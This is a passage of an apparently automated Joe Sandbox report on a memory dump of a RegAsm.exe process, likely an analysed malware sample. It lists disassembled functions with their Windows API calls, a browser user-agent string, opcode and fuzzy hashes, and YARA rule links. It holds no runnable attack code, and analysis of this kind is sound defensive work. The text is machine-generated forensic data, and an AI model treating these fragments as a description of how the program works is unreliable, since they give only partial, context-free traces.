                                                                                                                                                                                                                                            • Instruction ID: a3e28af1a6e542087ac90c1154b64dbc6460663fd420f83dfbf3d43e06370d13
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a60a9ab66fea74c40637482695fa9900cea410be327952e2ab23aa4d3da5d38c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2651E4B0E042588BDF04DFA4C9957FEBFB1AB86300F6040AAD9056B391DB795E80CB94
                                                                                                                                                                                                                                            Function 0042BB80 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 228COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 0042BCA5
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0000000A,00000000), ref: 0042BE18
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __aulldiv$CreateDirectory
                                                                                                                                                                                                                                            • String ID: n{$}{
                                                                                                                                                                                                                                            • API String ID: 1884557851-1042045087
                                                                                                                                                                                                                                            • Opcode ID: 6ab7070128d06952e5e5aaa6d2302bd675099e40f3905d025e939313535339c8
                                                                                                                                                                                                                                            • Instruction ID: 66b9d3cfa06ff6842aa64c5b26630d94d739c78e8baf54dc74469c93df3a3511
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ab7070128d06952e5e5aaa6d2302bd675099e40f3905d025e939313535339c8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06A117B1E002189BDB14CFA9D891BEEBBB5FF88304F14806AE509B7351D7786A45CF54
                                                                                                                                                                                                                                            Function 00441FA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 220registryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegEnumKeyExA.KERNEL32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,00000000,eks), ref: 00441FE0
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Enum
                                                                                                                                                                                                                                            • String ID: eks$j3l6lrek
                                                                                                                                                                                                                                            • API String ID: 2928410991-388657971
                                                                                                                                                                                                                                            • Opcode ID: 5741d05e6ade05d834c5ef7285d447ab262549685aef0b921472e3b7bd628322
                                                                                                                                                                                                                                            • Instruction ID: 77155a53bbcd42adee1225df54fde8591c151ba8b9222bbace11fba3b2234614
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5741d05e6ade05d834c5ef7285d447ab262549685aef0b921472e3b7bd628322
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6CB12270D002688FEB24CB95CD45BEEBBB0BF45304F1481DAE80967291DB786A89CF95
                                                                                                                                                                                                                                            Function 0050C070 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 129COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36, xrefs: 0050C1A8
                                                                                                                                                                                                                                            • @L, xrefs: 0050C0B7
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: @L$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            • API String ID: 0-928537598
                                                                                                                                                                                                                                            • Opcode ID: c8ce03a3233569af4ac6571cc91ac47f3734f59005d2c83e91e243b44067494e
                                                                                                                                                                                                                                            • Instruction ID: cd128c93f7bf3c8193ebd90fc6991d5aa691f55d1707b9aec00d476382a1c62c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8ce03a3233569af4ac6571cc91ac47f3734f59005d2c83e91e243b44067494e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5351C1B5E00209ABDB08DFD9D895BEEBBF5BF88300F10811AE505A7384D7746A41CB94
                                                                                                                                                                                                                                            Function 00416D40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::ios_base::clear.LIBCPMTD ref: 00416E67
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: std::ios_base::clear
                                                                                                                                                                                                                                            • String ID: WA$`XA
                                                                                                                                                                                                                                            • API String ID: 1443086396-855112263
                                                                                                                                                                                                                                            • Opcode ID: 9174b6db1c77a7698fd39d58929472cddf39052d8f216809a051ca9c6b75448d
                                                                                                                                                                                                                                            • Instruction ID: e507a5a32f7d3b5dcada019a18e74b4090ae13039539df578e4dc11480ba84bb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9174b6db1c77a7698fd39d58929472cddf39052d8f216809a051ca9c6b75448d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC41C774A04209EFDB04DF99C891BAEBBB1FF48304F118199E515AB391C775AE81CF94
                                                                                                                                                                                                                                            Function 0041F8A0 Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000001), ref: 0041F8D4
                                                                                                                                                                                                                                            • _com_issue_error.COMSUPP ref: 0041F8F2
                                                                                                                                                                                                                                            • _com_issue_error.COMSUPP ref: 0041F91B
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _com_issue_error$AllocString
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 245909816-0
                                                                                                                                                                                                                                            • Opcode ID: 38770064ea28288b514d44249654f2ceda9ca7d077d6ec7c02e66c4bd89a294c
                                                                                                                                                                                                                                            • Instruction ID: 0b77db6c1808a706a69a158a1ad001aa90e12922d7a39361793bd48e8c80f6db
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 38770064ea28288b514d44249654f2ceda9ca7d077d6ec7c02e66c4bd89a294c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB11D7B4900208EFDB00EF94C549B9DBBB1EF44304F2081A9D9096B391D7B9AE86DB85
                                                                                                                                                                                                                                            Function 0054F61E Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,0054F618,00000000,0054AEEA,?,?,CA1D138C,0054AEEA,?), ref: 0054F62F
                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,0054F618,00000000,0054AEEA,?,?,CA1D138C,0054AEEA,?), ref: 0054F636
                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 0054F648
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                                                                                            • Opcode ID: 9e78dbbd2fb4bca78452b5b966021151efd374b181a3b1eadfc29377a94dc8f9
                                                                                                                                                                                                                                            • Instruction ID: 3f3e1e3b99468d25dce7cab22bc1d67e34f82d963ad3b761a18f6f9253370fe0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e78dbbd2fb4bca78452b5b966021151efd374b181a3b1eadfc29377a94dc8f9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6D09E3140010DBBDF113F69DC0D99A3F2DBF50355B454024F91987132DB729996EB94
                                                                                                                                                                                                                                            Function 005584FB Relevance: 3.2, APIs: 2, Instructions: 196fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00557C11: GetConsoleOutputCP.KERNEL32(CA1D138C,00000000,00000000,00000000), ref: 00557C74
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,0000000C,?,00000000,00588A50,00000014,0054F044,00000000,00000000,00000000), ref: 00558680
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 0055868A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2915228174-0
                                                                                                                                                                                                                                            • Opcode ID: 93fb4403363359f6b7e5581cd26bd50e14db84a2fa6c457b04d38745cbba1a44
                                                                                                                                                                                                                                            • Instruction ID: 7e5d937b40cb86f1a91303876627bbacf9d7c5db9323ae4555d6a3acf967a568
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 93fb4403363359f6b7e5581cd26bd50e14db84a2fa6c457b04d38745cbba1a44
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15619FB580011AAFDF11CFA8C895ABEBFB9BB59305F140556EC00B7252EB31D9099B90
                                                                                                                                                                                                                                            Function 00413370 Relevance: 3.2, APIs: 2, Instructions: 151COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __fread_nolock
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2638373210-0
                                                                                                                                                                                                                                            • Opcode ID: 14857784439bfb0fded491df7ca2f4847927c5f8360138fd09694560756da3c4
                                                                                                                                                                                                                                            • Instruction ID: 4da88d6e4580d709966acb3d768c5fb75a167052d54c8e7bb3f1329e39569909
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 14857784439bfb0fded491df7ca2f4847927c5f8360138fd09694560756da3c4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39617475A00109EFCB04CF98C594AEEBBB2FF88305F2081AAE915A7355D735AE81DF54
                                                                                                                                                                                                                                            Function 0054AD81 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetFilePointerEx.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,?,0054AD43,?,?,?,?,?), ref: 0054ADBD
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,0054AD43,?,?,?,?,?,00588670,00000018,0054AF14,?,?,?,?,?), ref: 0054ADCA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2976181284-0
                                                                                                                                                                                                                                            • Opcode ID: 18814e3d3e58956b9308e51246905c2eb57ed305e40aec464cc30f1ce1f8c9c6
                                                                                                                                                                                                                                            • Instruction ID: abae82f093606e27b09ad9464b4b3d0b26caf41557f2d5079a521825cfa87877
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 18814e3d3e58956b9308e51246905c2eb57ed305e40aec464cc30f1ce1f8c9c6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B5010436A14115AFCB058F99DC09DDE3F29FB85325B280209F8119B190E671E9419B90
                                                                                                                                                                                                                                            Function 0055A5CE Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,00000000,?,0055F161,0041C3C8,00000000,0041C3C8,?,0055F402,0041C3C8,00000007,0041C3C8,?,0055F9F7,0041C3C8,0041C3C8), ref: 0055A5E4
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(0041C3C8,?,0055F161,0041C3C8,00000000,0041C3C8,?,0055F402,0041C3C8,00000007,0041C3C8,?,0055F9F7,0041C3C8,0041C3C8), ref: 0055A5EF
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 485612231-0
                                                                                                                                                                                                                                            • Opcode ID: 364a6fa1e6d3d315b57dd3f44d38bfd42cd22917b739c09a8305668c146bf35e
                                                                                                                                                                                                                                            • Instruction ID: 181b53875a92b3ffd0e18ca616cb6882ade8f9942b46c1f443859408c2ee667b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 364a6fa1e6d3d315b57dd3f44d38bfd42cd22917b739c09a8305668c146bf35e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32E08C32A04204ABDF212FA6EC0DB9A3F58BB403A6F284161FA18D6060DBB09984D795
                                                                                                                                                                                                                                            Function 00557B71 Relevance: 2.6, APIs: 2, Instructions: 63COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,?,?,00557A58,00000000,?,00588A30,0000000C,00557B14,MT,?), ref: 00557BC7
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00557A58,00000000,?,00588A30,0000000C,00557B14,MT,?), ref: 00557BD1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 918212764-0
                                                                                                                                                                                                                                            • Opcode ID: 8aeb34b1122bea2897089ed340032fffe57dc5e1d5e65b1b18fd8521df8151a0
                                                                                                                                                                                                                                            • Instruction ID: 0ea216a494df05932795bb12278c4fed712d76d4d0375f6c705cae6cc8737cf8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8aeb34b1122bea2897089ed340032fffe57dc5e1d5e65b1b18fd8521df8151a0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B81159365081185AD62112757C6DB6D2F59BB89B36F28021BFC188B1C2EA648C8C5250
                                                                                                                                                                                                                                            Function 0054E275 Relevance: 1.7, APIs: 1, Instructions: 157COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 44f58bbe6362517f8939d61995812e340540805aafe0ad6d011666f991096d71
                                                                                                                                                                                                                                            • Instruction ID: 2084c553b3b9f275e34185bdb693a43adc2e45164d2a0e71ec78a3e3ac0d328b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44f58bbe6362517f8939d61995812e340540805aafe0ad6d011666f991096d71
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0851A175A00104AFDF15DF58CC8AAE9BFB1FF89328F248558F8499B252D271EE41CB90
                                                                                                                                                                                                                                            Function 004141F0 Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::ios_base::clear.LIBCPMTD ref: 00414372
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: std::ios_base::clear
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1443086396-0
                                                                                                                                                                                                                                            • Opcode ID: c0b83071acae89aeef5c8617323d510e3ce59be0cacf276acdf9a7531c41f33e
                                                                                                                                                                                                                                            • Instruction ID: 8e409c15ee317b51c278df72e56b2589d090603ccf85a204518ff5c11603a3ed
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c0b83071acae89aeef5c8617323d510e3ce59be0cacf276acdf9a7531c41f33e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69519EB4E04249DFCB14CF99D491AEEFBB1BF88310F24815AE915AB395C734A981CF94
                                                                                                                                                                                                                                            Function 00431F00 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(00000000), ref: 00431FDA
                                                                                                                                                                                                                                              • Part of subcall function 0053E35A: AcquireSRWLockExclusive.KERNEL32(0058E970,?,-00007535,?,004308C5,00590F6C,?,0000000A,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 0053E365
                                                                                                                                                                                                                                              • Part of subcall function 0053E35A: ReleaseSRWLockExclusive.KERNEL32(0058E970,?,-00007535,?,004308C5,00590F6C,?,0000000A,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 0053E39F
                                                                                                                                                                                                                                              • Part of subcall function 0053E309: AcquireSRWLockExclusive.KERNEL32(0058E970,-00007535,?,004308F2,00590F6C), ref: 0053E313
                                                                                                                                                                                                                                              • Part of subcall function 0053E309: ReleaseSRWLockExclusive.KERNEL32(0058E970,?,004308F2,00590F6C,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 0053E346
                                                                                                                                                                                                                                              • Part of subcall function 0053E309: WakeAllConditionVariable.KERNEL32(0058E96C,?,004308F2,00590F6C,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 0053E351
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExclusiveLock$AcquireRelease$ConditionCurrentDirectoryVariableWake
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 350265564-0
                                                                                                                                                                                                                                            • Opcode ID: b536992b412f99582977fbc9764f8fcd8beccc927c40204cbeb4cf1d20a3ae1d
                                                                                                                                                                                                                                            • Instruction ID: c310fdeb5a083e577c01ea4250973ffe74c2bb959c660fd7ddc64710599b3d45
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b536992b412f99582977fbc9764f8fcd8beccc927c40204cbeb4cf1d20a3ae1d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D219EB4D002098FCF14DFA4C8859AEBBB1FF88304F14856AE80667394D735AA49CF96
                                                                                                                                                                                                                                            Function 0042CE20 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetUserGeoID.KERNEL32(00000010), ref: 0042CE30
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: User
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 765557111-0
                                                                                                                                                                                                                                            • Opcode ID: ef8258a1911f9aa119110de39289810a1352633f695b1a773551b0307fc6c2c0
                                                                                                                                                                                                                                            • Instruction ID: c4707849ce39850d1815e66c25a692d446deca643534161b110d06009653fb30
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ef8258a1911f9aa119110de39289810a1352633f695b1a773551b0307fc6c2c0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D11B7B9E40209BFDB00DFE4D846BAEBBB4BB48700F1041A9EA14A7380D6716A009B95
                                                                                                                                                                                                                                            Function 0055C286 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,0041C3C8,?,0055A28F,00000001,00000364,0041C3C8,00000006,000000FF,?,?,0054E126,0055A64B,-000927C0), ref: 0055C2C7
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                            • Opcode ID: d8e0490d251d1ba86fa582098466794d4c8501324879ce13c3223da671017fad
                                                                                                                                                                                                                                            • Instruction ID: 33bc032ac356ba11124bfa49aa80fd72e248d41ff50e084ce45d6eb8378f908f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8e0490d251d1ba86fa582098466794d4c8501324879ce13c3223da671017fad
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8F02439A44321AE9B205AA2DC25A5B3F59BF917A2F145113AC84E6094CA20DC4996A0
                                                                                                                                                                                                                                            Function 0041D950 Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMTD ref: 0041D967
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 118556049-0
                                                                                                                                                                                                                                            • Opcode ID: c2b78d07dd7f3cfbff7048cadcbd5d1dda04bb57e1d1ea51057e93f20c614c49
                                                                                                                                                                                                                                            • Instruction ID: 637604d627c08a5797b21f27af9890a3e9d937d8568771b3f86609c91c159c48
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2b78d07dd7f3cfbff7048cadcbd5d1dda04bb57e1d1ea51057e93f20c614c49
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40F044F4D0010CEBCB04EFA8C48569EFBB1EF44744F1081AAE80597394D6349F81DB85
                                                                                                                                                                                                                                            Function 00500570 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMTD ref: 0050058D
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 118556049-0
                                                                                                                                                                                                                                            • Opcode ID: 00b24e84eee76cbf20e33da27bb64dbea8ba0c9a40d0292b4007061cab9f218c
                                                                                                                                                                                                                                            • Instruction ID: 5be3fed50b1487be26c4db14e1e0c1881e0882e204833b123695ebb54087ba8b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 00b24e84eee76cbf20e33da27bb64dbea8ba0c9a40d0292b4007061cab9f218c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0FF019B4C0420DAACF14EFA4C8457DDBFF4AB04344F1084AED8052B2C1D6B9A685CF96
                                                                                                                                                                                                                                            Function 0055A608 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,0041C3C8,-000927C0,?,0053E038,0041C3C8,?,0041C3C8,00000000,?,0041A2D6), ref: 0055A63A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
